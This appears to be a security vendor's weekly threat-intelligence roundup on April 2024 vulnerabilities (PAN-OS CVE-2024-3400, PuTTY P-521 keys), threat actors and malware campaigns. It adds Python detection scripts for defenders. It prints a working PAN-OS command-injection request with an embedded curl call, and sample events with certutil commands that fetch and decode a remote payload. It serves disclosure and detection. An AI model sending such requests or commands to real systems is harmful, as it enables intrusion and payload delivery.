April 19: Top Threat Actors, Malware, Vulnerabilities and Exploits

Welcome to Picus Security's weekly cyber threat intelligence roundup! 

Each month, our goal is to provide insights into the most recent and key malware attacks and vulnerability exploitation campaigns that could potentially affect your industry and region. Recognizing that a blog might not fully cater to your specific threat intelligence requirements, we're excited to introduce a new platform. This platform is crafted to deliver the most customized cyber threat intelligence, directly addressing your unique needs.

Our new threat intelligence tool will enable you to identify threats targeting your region and sector, understand your security posture in comparison to similar organizations, and receive easy-to-implement mitigation signatures from a variety of vendors. Additionally, it will offer a report that you can use to communicate with your peers or within your organization, ensuring that you are well-informed and prepared to address cyber threats effectively.

April 19: Latest Vulnerabilities, Exploits and Patches

Here are the top vulnerabilities and exploitations observed in the second and third weeks of April.

CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect

  • Victim Sector: Technology

  • Affected Products: PAN-OS operating system for Palo Alto Networks' security appliances

  • Vulnerability: Command Injection Vulnerability

  • Threat Actor: State-sponsored threat group UTA0218

  • Actor Motivation: Financial Gain

  • CVE: CVE-2024-3400

  • Malware: UPSTYLE Backdoor

    • MD5: 0c1554888ce9ed0da1583dbdf7b31651
    • SHA1: 988fc0d23e6e30c2c46ccec9bbff50b7453b8ba9
    • SHA256: 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac

CVE-2024-3400 is a critical command injection vulnerability identified in PAN-OS, the operating system for Palo Alto Networks' security appliances, including their next-generation firewalls. 

Disclosed by Palo Alto Networks on April 12, 2024, this flaw, scored at 10.0 (Critical) on the CVSS scale, permits unauthenticated remote attackers to execute arbitrary commands with root privileges on affected devices. The vulnerability resides within the GlobalProtect feature's telemetry functionality, which improperly handles the SESSID variable in HTTP POST requests. Attackers can manipulate this vulnerability by crafting a malicious SESSID in an HTTP cookie, which then injects shell commands that are executed by the server.

POST /ssl-vpn/hipreport.esp HTTP/1.1
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hello`curl{$IFS}example.com`;

Note that this vulnerability has already been exploited in the wild, as evidenced by the UPSTYLE backdoor deployed by threat actors using this exploit for sustained access into compromised systems.

Given its severity and potential to facilitate initial access, persistence, data exfiltration, or lateral movement within networks, organizations using affected PAN-OS versions are strongly advised to apply the provided patches without delay [1]. 
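The request shape above gives defenders a concrete thing to look for: a SESSID cookie that carries path separators, ".." traversal or shell syntax instead of an opaque session token. The following is an added detection example, not code from Picus or Palo Alto Networks. It assumes raw HTTP requests are available (from a proxy, WAF or packet capture) and that a benign GlobalProtect session ID is a short alphanumeric token; the sample requests are constructed, with the malicious one copied from the write-up above. It is a triage aid, not a replacement for the vendor's patch or threat-prevention signatures.

```python
import re
from typing import Dict, List

# Constructed sample requests (not real traffic). The second one carries the
# SESSID shape shown in the write-up; the others use ordinary session IDs.
SAMPLE_REQUESTS = [
    "POST /ssl-vpn/hipreport.esp HTTP/1.1\r\nHost: vpn.example.com\r\n"
    "Cookie: SESSID=abc123def456\r\n\r\n",
    "POST /ssl-vpn/hipreport.esp HTTP/1.1\r\nHost: vpn.example.com\r\n"
    "Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hello`curl{$IFS}example.com`;\r\n\r\n",
    "GET /global-protect/login.esp HTTP/1.1\r\nHost: vpn.example.com\r\n"
    "Cookie: SESSID=zzz; other=1\r\n\r\n",
]

COOKIE_HEADER_RE = re.compile(r"^Cookie:[ \t]*(.*?)\r?$", re.IGNORECASE | re.MULTILINE)
# Assumed shape of a benign session ID: an opaque token with no path or shell characters.
BENIGN_SESSID_RE = re.compile(r"^[A-Za-z0-9_-]{1,128}$")
SHELL_META_RE = re.compile(r"[`$;|&(){}<>]")


def parse_cookies(raw_request: str) -> Dict[str, str]:
    """Return the cookies of a raw HTTP request as a name -> value map."""
    m = COOKIE_HEADER_RE.search(raw_request)
    if not m:
        return {}
    cookies: Dict[str, str] = {}
    # Cookie pairs are separated by "; "; a bare ";" inside a value stays part of the value.
    for pair in re.split(r";[ \t]+", m.group(1).strip()):
        name, sep, value = pair.partition("=")
        if sep:
            cookies[name.strip()] = value
    return cookies


def request_target(raw_request: str) -> str:
    """Return the request-target (e.g. '/ssl-vpn/hipreport.esp') from the request line."""
    first_line = raw_request.split("\r\n", 1)[0].split("\n", 1)[0]
    parts = first_line.split()
    return parts[1] if len(parts) >= 2 else ""


def assess_sessid(value: str) -> List[str]:
    """Reasons a SESSID value looks like an injection attempt (empty list = benign)."""
    reasons: List[str] = []
    if ".." in value:
        reasons.append("path_traversal")
    if "/" in value or "\\" in value:
        reasons.append("path_separator")
    if SHELL_META_RE.search(value):
        reasons.append("shell_metacharacters")
    if not reasons and not BENIGN_SESSID_RE.match(value):
        reasons.append("unexpected_format")
    return reasons


def scan(requests: List[str]) -> List[Dict[str, object]]:
    """Flag requests whose SESSID cookie carries traversal or shell syntax."""
    findings: List[Dict[str, object]] = []
    for i, raw in enumerate(requests):
        sessid = parse_cookies(raw).get("SESSID")
        if sessid is None:
            continue
        reasons = assess_sessid(sessid)
        if reasons:
            findings.append({"index": i, "uri": request_target(raw),
                             "sessid": sessid, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_REQUESTS):
        print(f"request #{f['index']} {f['uri']}: {', '.join(f['reasons'])}")
```

Any hit should be correlated with the device's own logs (the SESSID value names a path under the telemetry directory, which is what the write-up says is abused) and with outbound connections from the firewall's management plane, since the injected command in the sample reaches out to an external host.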

Critical PuTTY SSH Client Vulnerability Enables Recovery of Cryptographic Private Keys

  • Victim Sector: Technology

  • Affected Products: PuTTY Versions 0.68 through 0.80 

  • Vulnerability: Unauthorized SSH Server Access

A vulnerability identified as CVE-2024-31497 in PuTTY versions 0.68 through 0.80 allows attackers with access to 60 cryptographic signatures to potentially recover the private keys used for their generation. PuTTY, a widely-used open-source terminal emulator that supports SSH, Telnet, SCP, and SFTP, is primarily utilized by system administrators and developers for remote server management via SSH from Windows-based clients.

This vulnerability stems from how PuTTY generates ECDSA nonces for the NIST P-521 curve, used in SSH authentication. Discovered by researchers Fabian Bäumer and Marcus Brinkmann from Ruhr University Bochum, the issue arises due to PuTTY's deterministic nonce generation method, originally designed to compensate for insufficient cryptographic random number generators on certain Windows versions. This method introduces a significant bias, especially problematic for the P-521 curve, leading to predictable values that could compromise private key security. Consequently, this could allow unauthorized SSH server access or enable attackers to impersonate developers by signing commits, raising the potential for severe security breaches including supply chain attacks.
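Because the weakness is in how signatures were made, a server cannot tell from an authorized_keys entry whether a given P-521 key was ever used from an affected PuTTY; the practical response is to inventory every ecdsa-sha2-nistp521 public key (authorized_keys files, Git allowed_signers, CI and forge key stores) and rotate them. The following is an added example of that inventory step, not code from the PuTTY project or the researchers. It parses OpenSSH public-key lines, decodes the key blob to confirm the curve named inside it matches the header, and reports keys to rotate; the authorized_keys content is constructed, with dummy point bytes rather than real keys.

```python
import base64
import struct
from typing import Dict, List, Optional

# Key type whose PuTTY-generated signatures were biased (see write-up above).
AFFECTED_KEY_TYPE = "ecdsa-sha2-nistp521"
AFFECTED_CURVE = "nistp521"


def _ssh_string(data: bytes) -> bytes:
    """Encode one SSH 'string' field: 4-byte big-endian length + bytes (RFC 4251)."""
    return struct.pack(">I", len(data)) + data


def _read_ssh_strings(blob: bytes) -> List[bytes]:
    """Split a public-key blob into its SSH 'string' fields."""
    fields: List[bytes] = []
    off = 0
    while off < len(blob):
        if off + 4 > len(blob):
            raise ValueError("truncated length field")
        (n,) = struct.unpack(">I", blob[off:off + 4])
        off += 4
        if off + n > len(blob):
            raise ValueError("truncated string field")
        fields.append(blob[off:off + n])
        off += n
    return fields


def make_key_line(key_type: str, fields: List[bytes], comment: str, options: str = "") -> str:
    """Build an OpenSSH public-key line from constructed fields (sample data only)."""
    blob = _ssh_string(key_type.encode()) + b"".join(_ssh_string(f) for f in fields)
    line = f"{key_type} {base64.b64encode(blob).decode()} {comment}"
    return f"{options} {line}" if options else line


# Constructed authorized_keys content; the point bytes are dummies, not real keys.
SAMPLE_AUTHORIZED_KEYS = [
    "# constructed sample, not a real authorized_keys file",
    make_key_line("ssh-ed25519", [b"\x01" * 32], "alice@laptop"),
    make_key_line("ecdsa-sha2-nistp256", [b"nistp256", b"\x04" + b"\x02" * 64], "bob@build"),
    make_key_line("ecdsa-sha2-nistp521", [b"nistp521", b"\x04" + b"\x03" * 132],
                  "carol@putty-win", options='restrict,from="10.0.0.0/8"'),
    "",
]


def classify_key_line(line: str) -> Optional[Dict[str, object]]:
    """Parse one authorized_keys-style line and say whether the key needs rotation."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    parts = line.split()
    # Skip an optional options prefix: the key type is the first token that looks like one.
    idx = next((i for i, p in enumerate(parts) if p.startswith(("ssh-", "ecdsa-", "sk-"))), None)
    if idx is None or idx + 1 >= len(parts):
        return None
    key_type, b64 = parts[idx], parts[idx + 1]
    comment = " ".join(parts[idx + 2:])
    try:
        fields = _read_ssh_strings(base64.b64decode(b64, validate=True))
        blob_type = fields[0].decode()
    except (ValueError, IndexError, UnicodeDecodeError, struct.error):
        return {"key_type": key_type, "curve": None, "comment": comment, "status": "unparseable"}
    curve = None
    if key_type.startswith("ecdsa-") and len(fields) > 1:
        curve = fields[1].decode(errors="replace")  # second field names the curve
    if blob_type != key_type:
        status = "type_mismatch"  # header and blob disagree; treat as suspicious
    elif key_type == AFFECTED_KEY_TYPE and curve == AFFECTED_CURVE:
        status = "rotate"
    else:
        status = "ok"
    return {"key_type": key_type, "curve": curve, "comment": comment, "status": status}


def find_keys_to_rotate(lines: List[str]) -> List[Dict[str, object]]:
    """Return only the entries whose key type and curve are the affected P-521."""
    results = [classify_key_line(ln) for ln in lines]
    return [r for r in results if r is not None and r["status"] == "rotate"]


if __name__ == "__main__":
    for r in find_keys_to_rotate(SAMPLE_AUTHORIZED_KEYS):
        print(f"rotate: {r['key_type']} ({r['comment']})")
```

Rotation means generating a new key pair on a fixed client, replacing the public key everywhere it is trusted, and removing the old one; since signatures made with the old key may already have leaked it, simply upgrading PuTTY is not enough on its own.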

April 19: Top Threat Actors Observed In Wild

Here are the top threat actors that were active in the second and third weeks of April.

IntelBroker Claims Space-Eyes Breach, Targeting US National Security Data

  • Victim Location: United States

  • Victim Organization: Space-Eyes

  • Threat Actor: IntelBroker

  • Threat Actor Motivation: Sensitive Information Exfiltration 

The cybersecurity community is currently monitoring a high-profile claim by the hacker known as "IntelBroker" regarding a significant breach at Space-Eyes, a Miami-based geospatial intelligence firm known for its close work with U.S. national security agencies. 

IntelBroker announced the breach on Breach Forums, claiming that it took merely 10-15 minutes to infiltrate the firm's defenses and access highly sensitive data. This data allegedly includes confidential documents and correspondences integral to U.S. national security, involving key government clients such as the Department of Justice, Department of Homeland Security, and the National Geospatial-Intelligence Agency.

(Screenshot credit: Hackread.com)

The implications of this breach are profound, as the exposed data reportedly encompasses detailed profiles of individuals and entities denied or sanctioned under U.S. law, potentially affecting national security operations. Space-Eyes has yet to confirm the breach officially, but the CISA has been notified, and investigations are underway. This incident echoes a previous breach by IntelBroker against Acuity Inc., another federal contractor, suggesting a pattern in targeting security-sensitive entities.

The Russian APT Group Sandworm Masquerading as a Hacktivist Group in Water Utility Breach

  • Threat Actor: Sandworm (a.k.a. APT44) Hacking Group

  • Threat Actor Origin: Russia

  • Actor Motivation: Sensitive Information Exfiltration for GRU

  • Victim Location: U.S., Poland, France

  • Sectors: Infrastructure

The Russian hacking group known as Sandworm (APT44), which operates under the auspices of Russian Military Intelligence (GRU), has been employing a deceptive tactic by masquerading as hacktivist groups to conduct its cyber operations [2]. This strategy involves creating multiple online personas and using these identities to manage narratives that align with Russian interests. Sandworm, which has been active since 2009 and is officially part of the Main Centre for Special Technologies within the GRU, is known for its versatility in cyber warfare, employing methods ranging from phishing and credential harvesting to exploiting vulnerabilities and conducting supply-chain attacks.

Recently, Sandworm has utilized at least three Telegram channels (XakNet Team, CyberArmyofRussia_Reborn, and Solntsepek) to promote its activities and spread misinformation. These channels, though seemingly independent, are closely linked to Sandworm's operations, with some of them found to have been created from infrastructure directly tied to the group. For example, CyberArmyofRussia_Reborn, which claimed responsibility for cyberattacks against water utilities in the U.S. and Poland and a hydroelectric facility in France [3], was found to use the same infrastructure for exfiltrating data from its targets.

The shift in Sandworm's activities to include the use of hacktivist facades suggests an adaptation in tactics, likely aimed at obfuscating their operations and enhancing the psychological impact of their attacks. 

TA558 Hackers Weaponize Images for Wide-Scale Malware Attacks

The threat actor identified as TA558 has been employing steganography—an advanced technique for hiding malicious code within images—to distribute a variety of malware, including Agent Tesla, FormBook, Remcos RAT, LokiBot, GuLoader, Snake Keylogger, and XWorm [5]. This method was detailed in a report by Russian cybersecurity firm Positive Technologies, which revealed that TA558 embedded malicious Visual Basic Scripts (VBS), PowerShell code, and RTF documents with exploits into image and text files. Dubbed SteganoAmor, the campaign predominantly targets sectors such as industrial, services, public utilities, electric power, and construction across Latin America, with additional attacks noted in Russia, Romania, and Turkey.

Moreover, TA558 has been observed launching Venom RAT through phishing campaigns aimed at organizations in Spain, Mexico, the United States, Colombia, Portugal, Brazil, the Dominican Republic, and Argentina [5]. These attacks typically start with a phishing email that includes a booby-trapped Microsoft Excel attachment exploiting the CVE-2017-11882 vulnerability in Equation Editor. This initial breach facilitates the download of a Visual Basic Script which then retrieves two images containing hidden, Base64-encoded components that deploy the Agent Tesla malware on the compromised system. Beyond just deploying malware, TA558 manipulates legitimate but compromised SMTP servers to send phishing emails, enhancing their seeming legitimacy and evading detection by email security gateways. Additionally, the group uses compromised FTP servers to store stolen data, demonstrating a sophisticated multi-vector approach to cyber espionage and data theft.

April 19: Latest Malware Attacks

Here are the malware attacks and campaigns that were active in the second and third weeks of April.

APT44 Is Deploying New 'Kapeka' Backdoor in Eastern European Attacks

  • Victim Location: Estonia, Ukraine

  • Threat Actor: Sandworm (APT44) Threat Group

  • Actor Motivation: Cyber Espionage, Data Theft, Destructive Attack

  • Malware: Kapeka

  • Known IOCs

A new form of cyber threat, the Kapeka backdoor, has been identified targeting Eastern European countries including Estonia and Ukraine. This backdoor is attributed to the Russian APT group known as Sandworm, also tracked as APT44 or Seashell Blizzard.

Finnish cybersecurity firm WithSecure [6], alongside Microsoft, revealed that Kapeka has been in use since at least mid-2022, serving both as an initial access tool and a sustainable access vector in victim networks. Designed as a Windows DLL, Kapeka masquerades as a Microsoft Word add-in, enhancing its stealth and making it difficult to detect. It features capabilities for remote command execution, data theft, and executing ransomware attacks, all controlled through C2 communications that use JSON for transmitting data. The backdoor supports dynamic updates from its C2 server, allowing continuous evolution to evade detection and remediation efforts. Notably, the deployment of Kapeka involves the use of compromised websites and the certutil utility, a legitimate tool exploited to fetch the malicious payload, indicative of the sophisticated nature of this APT's operations and its historical lineage connected to tools like GreyEnergy and BlackEnergy [7].
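The delivery detail that is easiest to act on is the use of certutil to fetch the payload: certutil is a signed Windows binary, so it is not blocked by allow-listing, but a download or decode invocation from a user workstation is a strong process-creation signal. The following is an added detection example, not code from WithSecure, Microsoft or Picus, and it does not use Kapeka-specific indicators (the page lists none). It assumes process-creation events are available as JSON lines with image, command line and parent fields (a Sysmon-like shape); the events below are constructed, and the address is from the TEST-NET-3 documentation range.

```python
import json
import re
from typing import Dict, List, Optional

# Constructed process-creation events (not real telemetry), one JSON object per line.
SAMPLE_EVENTS = [
    r'{"ts": "2024-04-15T09:12:03Z", "host": "ws-017", "user": "CORP\\jdoe", "parent": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Windows\\System32\\certutil.exe", "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.10/update.bin C:\\Users\\Public\\update.bin"}',
    r'{"ts": "2024-04-15T09:12:09Z", "host": "ws-017", "user": "CORP\\jdoe", "parent": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Windows\\System32\\certutil.exe", "cmdline": "certutil.exe -decode C:\\Users\\Public\\update.bin C:\\Users\\Public\\update.dll"}',
    r'{"ts": "2024-04-15T10:01:44Z", "host": "srv-ca1", "user": "CORP\\pkiadmin", "parent": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\certutil.exe", "cmdline": "certutil.exe -verify C:\\certs\\site.cer"}',
    r'{"ts": "2024-04-15T10:05:10Z", "host": "ws-017", "user": "CORP\\jdoe", "parent": "C:\\Windows\\explorer.exe", "image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "cmdline": "WINWORD.EXE /n report.docx"}',
]

URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s\"']+", re.IGNORECASE)
FETCH_FLAGS = {"-urlcache", "-verifyctl"}   # switches that make certutil download from a URL
DECODE_FLAGS = {"-decode", "-decodehex"}    # switches that turn an encoded file into a binary


def _flags(cmdline: str) -> set:
    """Collect certutil switches, normalising '/x' to '-x' and lower-casing."""
    out = set()
    for tok in cmdline.split():
        if tok[:1] in ("-", "/") and len(tok) > 1:
            out.add("-" + tok[1:].lower())
    return out


def classify_event(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Flag certutil invocations used to fetch or decode a payload rather than manage certificates."""
    image = event.get("image", "")
    if not image.lower().endswith("\\certutil.exe"):
        return None
    cmdline = event.get("cmdline", "")
    flags = _flags(cmdline)
    urls = URL_RE.findall(cmdline)
    reasons: List[str] = []
    if flags & FETCH_FLAGS and urls:
        reasons.append("remote_fetch")
    if flags & DECODE_FLAGS:
        reasons.append("payload_decode")
    if not reasons:
        return None
    return {"ts": event.get("ts"), "host": event.get("host"), "user": event.get("user"),
            "parent": event.get("parent"), "reasons": reasons, "urls": urls, "cmdline": cmdline}


def scan_events(lines: List[str]) -> List[Dict[str, object]]:
    """Run the classifier over JSON lines, skipping malformed ones instead of failing."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        finding = classify_event(event)
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"{f['ts']} {f['host']} {f['user']}: {', '.join(f['reasons'])} <- {f['parent']}")
```

The "payload_decode" reason will also fire on legitimate PKI administration, so in practice the rule is scoped by host role (workstations rather than CA servers) and by parent process; a certutil download whose parent is an Office application or a script host is the case worth paging on.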

Nexperia, a Silicon-Based Processor Manufacturer, Suffers a Ransomware Attack

  • Victim Sector: Technology

  • Timeline of Activity: April 12, 2024

  • Victim Organization: Nexperia

  • Victim Location: Netherlands

  • Threat Actor: Dunghill Group, Scattered Spider

  • Actor Motivation: Sensitive Data Exfiltration, Financial Gain

Nexperia, a prominent manufacturer of silicon-based processors based in the Netherlands, recently suffered a significant ransomware attack orchestrated by a group identified as the Dunghill Group, also known as the DARK ANGELS RANSOMWARE GROUP [4]. 

During the attack on April 12, 2024, the group reportedly compromised Nexperia's production servers and exfiltrated over 1TB of critical data, including proprietary chip designs, R&D data, as well as personal and customer information from major clients like Huawei, SpaceX, and Apple Inc. In response, Nexperia has activated its business continuity plan to manage data recovery and has informed law enforcement authorities about the breach.


[1] Palo Alto Networks PSIRT, “CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect,” Palo Alto Networks Product Security Assurance, Apr. 12, 2024. Available: https://security.paloaltonetworks.com/CVE-2024-3400. [Accessed: Apr. 18, 2024]

[2] B. Toulas, “Russian Sandworm hackers pose as hacktivists in water utility breaches,” BleepingComputer, Apr. 17, 2024. Available: https://www.bleepingcomputer.com/news/security/russian-sandworm-hackers-pose-as-hacktivists-in-water-utility-breaches/. [Accessed: Apr. 18, 2024]

[3] A. Chadda, “Sandworm Group Shifts to Espionage Attacks, Hacktivist Personas,” Decipher, Apr. 17, 2024. Available: https://duo.com/decipher/sandworm-group-shifts-to-espionage-attacks-hacktivist-personas. [Accessed: Apr. 18, 2024]

[4] N. Goud, “Nexperia Ransomware attack and some details about American hackers spreading ransomware,” Cybersecurity Insiders, Apr. 15, 2024. Available: https://www.cybersecurity-insiders.com/nexperia-ransomware-attack-and-some-details-about-american-hackers-spreading-ransomware/. [Accessed: Apr. 18, 2024]

[5] “TA558 Hackers Weaponize Images for Wide-Scale Malware Attacks,” The Hacker News, Apr. 16, 2024. Available: https://thehackernews.com/2024/04/ta558-hackers-weaponize-images-for-wide.html. [Accessed: Apr. 18, 2024]

[6] M. K. H. Nejad, “Kapeka: A novel backdoor spotted in Eastern Europe,” WithSecure Labs. Available: https://labs.withsecure.com/publications/kapeka. [Accessed: Apr. 18, 2024]

[7] “Russian APT Deploys New ‘Kapeka’ Backdoor in Eastern European Attacks,” The Hacker News, Apr. 17, 2024. Available: https://thehackernews.com/2024/04/russian-apt-deploys-new-kapeka-backdoor.html. [Accessed: Apr. 18, 2024]